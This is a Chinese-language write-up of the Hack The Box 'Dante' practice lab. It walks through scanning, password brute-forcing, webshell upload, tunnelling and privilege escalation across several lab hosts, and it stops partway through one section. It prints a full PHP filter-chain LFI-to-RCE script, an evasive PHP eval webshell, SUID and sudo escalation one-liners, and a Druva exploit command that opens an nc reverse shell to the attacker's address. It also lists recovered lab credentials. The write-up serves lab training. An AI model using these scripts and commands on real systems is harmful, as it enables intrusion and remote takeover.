HTB Dante Walkthrough

前言

最近忍痛买了HTB的pro labs， 购买之后可以打任何lab，还是挺划算的。这篇文章对Dante实验室作个简单的记录，不会提供任何一台机子的flag，只是给打靶又卡住了的师傅们提供一个解题的思路。建议还是自己亲自去打才能学到更多东西。getshell、提权以及横向的其他方式，师傅们可以自行研究。

注： 写这篇文章的时候，因为网络原因，重换了几次htb的vpn server，所以可能存在前后IP不同的情况。

打靶

存活主机探测

dante给的网段是10.10.110.0/24，直接fscan扫，扫描结果：

┌──(root㉿kali)-[/home/rainb0w/Desktop]
└─# fscan -h 10.10.110.0/24                        

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 10.10.110.2     is alive
(icmp) Target 10.10.110.100   is alive
[*] Icmp alive hosts len is: 2
10.10.110.100:21 open
10.10.110.100:22 open
[*] alive ports len is: 2
start vulscan
[+] ftp://10.10.110.100:21:anonymous 
已完成 1/2 [-] ssh 10.10.110.100:22 root 123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 1/2 [-] ssh 10.10.110.100:22 root root@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 1/2 [-] ssh 10.10.110.100:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 1/2 [-] ssh 10.10.110.100:22 root abc123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 1/2 [-] ssh 10.10.110.100:22 root Aa123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 1/2 [-] ssh 10.10.110.100:22 root Charge123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/2
[*] 扫描结束,耗时: 7m8.392454575s

I’m nuts and bolts about you

可以看到10.10.110.100这台机子可以匿名访问：

下载之后，有一个todo.txt，这是它的内容：

- Finalize WordPress permission changes - PENDING
- Update links to to utilize DNS Name prior to changing to port 80 - PENDING
- Remove LFI vuln from the other site - PENDING
- Reset James' password to something more secure - PENDING
- Harden the system prior to the Junior Pen Tester assessment - IN PROGRESS

有以下几点提示需要注意：

一个部署着wordpress的站点，用户的权限需要更改
别的站点存在LFI漏洞
james的密码可能容易被爆破出来

之后我们用nmap扫一下10.10.110.100：

┌──(root㉿kali)-[/home/rainb0w/Desktop]
└─# nmap -sS -sV -sC -A -p- --min-rate 5000 10.10.110.100  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-12 04:08 EDT
Nmap scan report for 10.10.110.100
Host is up (0.31s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.6
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.1.100 is not the same as 10.10.110.100
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8fa2ffcf4e3eaa2bc26ff45a2ad9e9da (RSA)
|   256 07838eb6f7e672e965db42fdedd693ee (ECDSA)
|_  256 1345c5cadba6b4ae9c097d21cd9d74f4 (ED25519)
65000/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/wordpress DANTE{fake_flag}
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
Aggressive OS guesses: Linux 4.15 - 5.6 (85%), Linux 5.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   ...
2   422.66 ms 10.10.110.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.58 seconds

发现还有一个65000的端口被开放，并且还存在一个/wordpress目录，还有一个robots.txt，进入拿到flag：

It’s easier this way

既然存在一个部署了wordpress，那就用wpscan扫一下吧：

观察扫描结果，可以看到扫出来了两个用户名，admin和james。回想刚刚的提示，我们可以尝试去爆破一下james的密码。但是密码太多了，为了节约时间先用cewl来给我们生成个字典：

──(root㉿kali)-[/home/rainb0w/Desktop]
└─# cewl http://10.10.110.100:65000/wordpress -w password.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

之后用wpscan来爆破密码，结果为：

wpscan --url http://10.10.110.100:65000/wordpress --usernames james -P password.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.110.100:65000/wordpress/ [10.10.110.100]
[+] Started: Mon May 15 02:14:19 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://10.10.110.100:65000/wordpress/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.110.100:65000/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.110.100:65000/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Debug Log found: http://10.10.110.100:65000/wordpress/wp-content/debug.log
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | Reference: https://codex.wordpress.org/Debugging_in_WordPress

[+] Upload directory has listing enabled: http://10.10.110.100:65000/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.110.100:65000/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.1 identified (Insecure, released on 2020-04-29).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.110.100:65000/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.4.1</generator>
 |  - http://10.10.110.100:65000/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.1</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.110.100:65000/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://10.10.110.100:65000/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://10.10.110.100:65000/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.2
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.110.100:65000/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.2, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:05 <=================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:05

[i] Config Backup(s) Identified:

[!] http://10.10.110.100:65000/wordpress/.wp-config.php.swp
 | Found By: Direct Access (Aggressive Detection)

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - james / Toyota                                                                                                                                                                                                      
Trying james / Motor Time: 00:00:32 <==================================================================                                                                                      > (400 / 893) 44.79%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: james, Password: Toyota

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon May 15 02:15:12 2023
[+] Requests Done: 540
[+] Cached Requests: 41
[+] Data Sent: 187.165 KB
[+] Data Received: 2.269 MB
[+] Memory used: 262.699 MB
[+] Elapsed time: 00:00:52

得到一对帐号密码：james:Toyota ，并且发现http://10.10.110.100:65000/wordpress/.wp-config.php.swp 。尝试用该帐号和密码登录后台，发现还是管理员权限：

之后在上传主题那里，上传一个webshell，可以在/wordpress/wp-content/uploads看到：

之后蚁剑连接拿到shell。在home目录下发现还存在一个叫james的用户：

继续用之前的密码登录一下拿到flag：

Show me the way

发现在james用户目录下存在.bash_histroy，以下是内容：

james@DANTE-WEB-NIX01:~$ cat .bash_history
cat .bash_history
cd /home/balthazar
rm .mysql_history
mysql -u balthazar -p TheJoker12345!

之后尝试SUID提权：

find / -user root -perm -4000 -print 2>/dev/null

find命令可以用如下方式提权：

find . -exec /bin/sh -p \; -quit进入sh，之后给/bin/bash设置SUID位，再/bin/bash -p即可。至此拿到DANTE-WEB-NIX01的root，别忘了添加路由。

Seclusion is an illusion

接下来用chisel搭一条代理隧道：

用fscan走这条代理扫一下内网：

┌──(root㉿kali)-[/home/rainb0w/Desktop]
└─# fscan -h 172.16.1.0/24 -socks5 127.0.0.1:1080
​
   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
Socks5Proxy: socks5://127.0.0.1:1080
start infoscan
172.16.1.101:21 open
172.16.1.10:80 open
172.16.1.20:22 open
172.16.1.5:21 open
172.16.1.1:80 open
172.16.1.12:22 open
172.16.1.20:80 open
172.16.1.13:80 open
172.16.1.10:22 open
172.16.1.100:21 open
172.16.1.12:80 open
172.16.1.100:22 open
172.16.1.12:21 open
172.16.1.19:80 open
172.16.1.17:80 open
172.16.1.100:80 open
172.16.1.102:80 open
172.16.1.5:135 open
172.16.1.20:135 open
172.16.1.101:135 open
172.16.1.102:135 open
172.16.1.5:139 open
172.16.1.17:139 open
172.16.1.10:139 open
172.16.1.20:139 open
172.16.1.102:139 open
172.16.1.101:139 open
172.16.1.12:443 open
172.16.1.20:443 open
172.16.1.1:443 open
172.16.1.13:443 open
172.16.1.102:443 open
172.16.1.5:445 open
172.16.1.10:445 open
172.16.1.20:445 open
172.16.1.17:445 open
172.16.1.13:445 open
172.16.1.101:445 open
172.16.1.102:445 open
172.16.1.5:1433 open
172.16.1.12:3306 open
172.16.1.102:3306 open
172.16.1.19:8080 open
172.16.1.20:88 open
172.16.1.17:10000 open
[*] alive ports len is: 45
start vulscan
已完成 0/45 [-] Ms17010 172.16.1.13 EOF
[*] WebTitle: http://172.16.1.1         code:301 len:178    title:301 Moved Permanently 跳转url: https://172.16.1.1/
[*] NetInfo:
[*]172.16.1.101
   [->]DANTE-WS02
   [->]172.16.1.101
[*] NetInfo:
[*]172.16.1.102
   [->]DANTE-WS03
   [->]172.16.1.102
[*] NetInfo:
[*]172.16.1.5
   [->]DANTE-SQL01
   [->]172.16.1.5
[*] WebTitle: http://172.16.1.12        code:302 len:0      title:None 跳转url: http://172.16.1.12/dashboard/
[*] WebTitle: http://172.16.1.19        code:200 len:553    title:Index of /
[*] WebTitle: http://172.16.1.100       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] WebTitle: http://172.16.1.13        code:302 len:0      title:None 跳转url: http://172.16.1.13/dashboard/
[*] WebTitle: http://172.16.1.17        code:200 len:963    title:Index of /
[*] NetInfo:
[*]172.16.1.20
   [->]DANTE-DC01
   [->]172.16.1.20
[*] WebTitle: http://172.16.1.10        code:200 len:28842  title:Dante Hosting
[*] WebTitle: https://172.16.1.12       code:302 len:0      title:None 跳转url: https://172.16.1.12/dashboard/
[*] WebTitle: http://172.16.1.102       code:200 len:1237   title:Dante Marriage Registration System :: Home Page
[*] WebTitle: https://172.16.1.102      code:200 len:1237   title:Dante Marriage Registration System :: Home Page
[*] WebTitle: https://172.16.1.13       code:302 len:0      title:None 跳转url: https://172.16.1.13/dashboard/
[*] WebTitle: http://172.16.1.20        code:200 len:3173   title:None
[*] WebTitle: https://172.16.1.1        code:200 len:8999   title:pfSense - Login
[*] WebTitle: https://172.16.1.20       code:200 len:3173   title:None
[+] 172.16.1.20 MS17-010        (Windows Server 2012 R2 Standard 9600)
[*] WebTitle: http://172.16.1.12/dashboard/ code:200 len:7574   title:Welcome to XAMPP
[*] WebTitle: http://172.16.1.13/dashboard/ code:200 len:7576   title:Welcome to XAMPP
[*] WebTitle: http://172.16.1.19:8080   code:403 len:793    title:None
[*] WebTitle: https://172.16.1.12/dashboard/ code:200 len:7574   title:Welcome to XAMPP
[*] WebTitle: https://172.16.1.1/       code:200 len:8999   title:pfSense - Login
[*] WebTitle: https://172.16.1.13/dashboard/ code:200 len:7576   title:Welcome to XAMPP
[+] http://172.16.1.20 poc-yaml-active-directory-certsrv-detect 
[+] https://172.16.1.20 poc-yaml-active-directory-certsrv-detect 
已完成 45/45
[*] 扫描结束,耗时: 8m5.925407215s

接下来我们看172.16.1.10，刚刚fscan扫到了22,80,139,445这些端口，先进一下web界面吧：

随便点旁边一个按钮，注意看上面的链接 ：

猜测存在LFI，尝试读一下/etc/passwd：

可以读到，并且我们可以看到有一个名为margaret的用户，只是它的shell不是bash而是lshell。因为这个站用的是php，并且存在LFI，所以我们可以构造php filter chain来RCE，关于构造php filter chain来RCE的方法我这里就不过多介绍了，打CTF的师傅们应该接触过，想要了解的可以看看Zedd师傅写的一篇文章：hxp CTF 2021 – The End Of LFI?。这篇文章从最简单的LFI开始，一步步构造php filter chain从而实现RCE，师傅们看了之后一定会很有收获的。 我这里直接贴脚本吧：

import requests
 
url = "http://172.16.1.10/nav.php"
file_to_use = "/etc/passwd"
command = "id"
 
#<?=`$_GET[0]`;;?>
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
 
conversions = {
    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
    'C': 'convert.iconv.UTF8.CSISO2022KR',
    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
    '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
    'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
    's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
    'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
    'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
    'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
    'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
    '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
    'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
    'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
    'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
    'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
    '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
    '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
}
 
 
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
 
 
for c in base64_payload[::-1]:
        filters += conversions[c] + "|"
        # decode and reencode to get rid of everything that isn't valid base64
        filters += "convert.base64-decode|"
        filters += "convert.base64-encode|"
        # get rid of equal signs
        filters += "convert.iconv.UTF8.UTF7|"
 
filters += "convert.base64-decode"
 
final_payload = f"php://filter/{filters}/resource={file_to_use}"
proxies = {
    'http': 'socks5://127.0.0.1:1080'
}
 
r = requests.get(url, params={
    "0": command,
    "action": "include",
    "page": final_payload
},proxies=proxies)
 
print(r.text)

脚本执行结果如下所示：

接下来就反弹个shell，直接改脚本里的命令即可：

之后我们读取/var/www/html/wordpress目录下的wp-config.php：

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME' 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'margaret' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Welcome1!2@3#' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

得到一组帐号密码：margaret:Welcome1!2@3#，还记得我们之前在/etc/passwd看到的那个账户吗？之后我们就通过ssh来连上去：

提示我们当前处于受限制的shell中，那接下来就是逃逸lshell了。通过google，我找到了一种逃逸方法，首先进入vim，之后执行下面两句：

:set shell=/bin/bash
:shell

之后我们就得到了/bin/bash这个shell了：

之后cat flag.txt又拿到了一个flag。

Snake it ‘til you make it

在margaret的用户目录下，存在一个.config目录，进入.config目录，发现使用了Slack，关于Slack的信息师傅们可以自行百度。可以找到缓存的文件~/.config/Slack/exported_data/secure/2020-05-18.json，里面有一些Frank和Margaret的对话，通过对话可以推理得知，这台机器正是迁移之后的ubuntu镜像主机，而frank的密码TractorHeadtorchDeskmat在缓存文件里面也被Margaret说出，我们直接看这里：

之后我们登录上frank：

上传pspy并运行，可以看到有这么一个进程：

在pspy中，我们发现这个进程每隔一段时间就会启动，并且是UID=0（root）来启动这个进程。但是我们不能直接修改apache_restart.py，因为权限不够：

那就看一下apache_restart.py的内容吧：

接下来想要提权，首先我们需要了解python导包的搜索顺序：

在当前目录下搜索该模块
在环境变量 PYTHONPATH 中指定的路径列表中依次搜索
在 Python 安装路径的 lib 库中搜索

虽然我们不能直接修改apache_restart.py，但是我们可以在/home/frank的路径下面添加py包呢。因此提权思路就是，在/home/frank的目录下添加一个urllib.py，内容可以是反弹shell，也可以是别的，只要你能拿到root的shell即可，我这里是给/bin/bash设置suid位：

之后/bin/bash -p就拿到root权限了，可以看flag了：

至此DANTE-NIX02也打完了。

Feeling fintastic

接下来我们看172.16.1.17，fscan扫出来的开放的端口是80、139、445以及10000。10000端口是webmin服务，对，就是漏洞多的yp的那个。但是没帐号密码，拿不到shell。开放了445端口，尝试smbclient连一下看看能不能拿到什么信息？

有一个forensics目录共享，proxychains4 smbclient \\\\172.16.1.17\\forensics：

存在一个文件名叫monitor的文件，把它下载下来，发现是一个流量包，wireshark分析一下：

可以看到上面这块通过POST请求/session_login.cgi之后就GET请求/，猜测此处的POST请求登录成功了，那就看一下有没有密码：

得到一组帐号密码admin:Password6543，之后去登录10000端口处的webmin服务，发现可以成功登录。之后就是用msf的exploit/linux/http/webmin_packageup_rce模块来拿到meterpreter了：

直接就是root权限，DANTE-NIX03也打完了。

Let’s take this discussion elsewhere

接下来我们看172.16.1.13，fscan的扫描结果显示开放的端口为80、443、445，进入80端口，是一个XAMPP的欢迎界面：

smbclient也连不上，443端口也跟80端口界面一样，那接下来就爆破一下80端口的web目录吧：

┌──(root㉿kali)-[/home/rainb0w/tools/pspy-master]
└─# dirsearch -u http://172.16.1.13/ -t 200 -x 404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --proxy=socks5://127.0.0.1:1080 

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                                 
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                          
                                                                                                                                                                                                                                 
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 200 | Wordlist size: 220545

Output File: /root/.dirsearch/reports/172.16.1.13/-_23-05-15_06-32-14.txt

Error Log: /root/.dirsearch/logs/errors-23-05-15_06-32-14.log

Target: http://172.16.1.13/

[06:32:15] Starting: 
[06:32:17] 301 -  332B  - /img  ->  http://172.16.1.13/img/                
[06:32:20] 301 -  336B  - /discuss  ->  http://172.16.1.13/discuss/        
[06:32:23] 403 -    1KB - /licenses                                        
[06:32:28] 301 -  338B  - /dashboard  ->  http://172.16.1.13/dashboard/    
[06:32:32] 403 -    1KB - /%20                                             
[06:32:32] 301 -  332B  - /IMG  ->  http://172.16.1.13/IMG/                
[06:32:49] 403 -    1KB - /*checkout*                                      
[06:32:57] 301 -  332B  - /Img  ->  http://172.16.1.13/Img/                
[06:33:07] 403 -    1KB - /phpmyadmin                                      
[06:33:25] 403 -    1KB - /webalizer                                       
[06:33:32] 403 -    1KB - /*docroot*                                       
[06:33:36] 403 -    1KB - /*                                               
[06:33:45] 403 -    1KB - /con                                             
[06:33:54] 301 -  338B  - /Dashboard  ->  http://172.16.1.13/Dashboard/    
[06:34:56] 403 -    1KB - /http%3A                                          
[06:35:16] 403 -    1KB - /**http%3a                                        
[06:35:34] 403 -    1KB - /*http%3A                                         
[06:35:36] 301 -  334B  - /xampp  ->  http://172.16.1.13/xampp/             
[06:36:18] 403 -    1KB - /aux                                              
[06:36:59] 403 -    1KB - /**http%3A                                        
[06:37:47] 403 -    1KB - /%C0                                              
[06:40:35] 403 -    1KB - /server-status                                    
[06:41:24] 403 -    1KB - /%3FRID%3D2671

利用dirsearch爆破除了个/discuss目录，进入之后，界面是这样的：

google一下之后，可以找到利用方法：https://www.exploit-db.com/exploits/48512。接下来我们开始注册，在注册上传头像那里直接上传webshell，只是这里似乎存在免杀？直接上传一句话webshell无法上传成功，因此尝试绕过：

<?php
function foo(&$var)
{
    $var = $_POST['a'];
}

$a="";
foo($a);
eval($a);
?>

一个很简单的免杀就绕过了，之后会显示注册成功的界面：

注册成功之后，进入/discuss/ups可以看到我们的webshell，蚁剑连接之后拿到shell（注意给蚁剑配置代理哦)。之后可以在C:\Users\Gerald\Desktop目录下看到flag。

Compare my numbers

当前拿到的shell是gerald用户的，接下来开始提权。 进入C:\Program Files (x86)之后可以看到存在一个Druva的目录：

在Druva inSync的windows客户端6.6.3版本中，存在相对路径遍历允许未经身份验证的本地攻击者以 SYSTEM 权限执行任意操作系统命令的漏洞。因此searchsploit搜索这个漏洞：

把48505.txt的后缀改为.py，将其和nc一起上传到靶机上，然后执行如下命令：

C:\Python27\python.exe 48505.py "windows\system32\cmd.exe /C C:\xampp\htdocs\discuss\ups\nc64.exe 10.10.14.2 1237 -e cmd.exe"

成功反弹到shell，此时权限为system，DANTE-WS01也成功打完：

Again and again

接下来我们看172.16.1.12，开放的端口有21、22、80、443以及3306。访问web界面，发现与172.16.1.13的界面一样，都是XAMPP的欢迎界面。尝试爆破目录，爆破出/blog目录。使用了Responsive Blog：

google一下找到了存在的漏洞，即http://172.16.1.12/blog/category.php?id=1此处存在sql注入，直接sqlmap一把梭：

sqlmap -u "http://172.16.1.12/blog/category.php?id=1" --proxy=socks5://127.0.0.1:1080 --dbs --batch

available databases [7]:                                                                                                                                                                             
[*] blog_admin_db
[*] flag
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

flag在flag数据库内。

Five doctors

之后爆blog_admin_db库：

Database: blog_admin_db                                                                                                                                                                              
[13 tables]
+-----------------------------+
| banner_posts                |
| blog_categories             |
| blogs                       |
| editors_choice              |
| links                       |
| membership_grouppermissions |
| membership_groups           |
| membership_userpermissions  |
| membership_userrecords      |
| membership_users            |
| page_hits                   |
| titles                      |
| visitor_info                |
+-----------------------------+

membership_users表的部分字段爆破结果如下所示：

+---------+----------+----------------+------------------------------------------+
| groupID | memberID | email          | passMD5                                  |
+---------+----------+----------------+------------------------------------------+
| 2       | admin    | <blank>        | 21232f297a57a5a743894a0e4a801fc3 (admin) |
| NULL    | ben      | ben@dante.htb  | 442179ad1de9c25593cabf625c0badb7         |
| 3       | egre55   | egre55@htb.com | d6501933a2e0ea1f497b87473051417f         |
| 1       | guest    | NULL           | NULL                                     |
+---------+----------+----------------+------------------------------------------+

将这三个hash保存在一个文件里，然后john爆破，以下是爆破结果：

得到了ben用户的密码，那看看ssh能不能再用这个密码连上去：

可以连接上去，在当前目录下可以拿到flag。

Minus + minus = plus?

之后执行一下sudo -l看看能用sudo执行哪些命令：

这个意思是指我们可以以任何人除了root的权限执行bash，而执行sudo –version可以看到sudo的版本为1.8.27，因此提权方式为sudo 1.8.27 - Security Bypass，执行sudo -u#-1 /bin/bash，可以以root权限执行任意命令：

与此同时，我们可以发现在系统中还存在一个julian用户，尝试读取/etc/shadow，并用john爆破得到密码，得到一对帐号密码：julian:manchesterunited，相信我，这个密码会在后面用到。至此，DANTE-NIX04也成功getroot。

Congratulations to a perfect pear

之后我们看172.16.1.102，开放了80、135、139、443、445以及3306端口。在网站的下方我们可以看到这个站使用了Online Marriage Registration System：

之后使用searchsploit来搜索这个框架，找到了一些POC：

随便拉取一个POC来打：

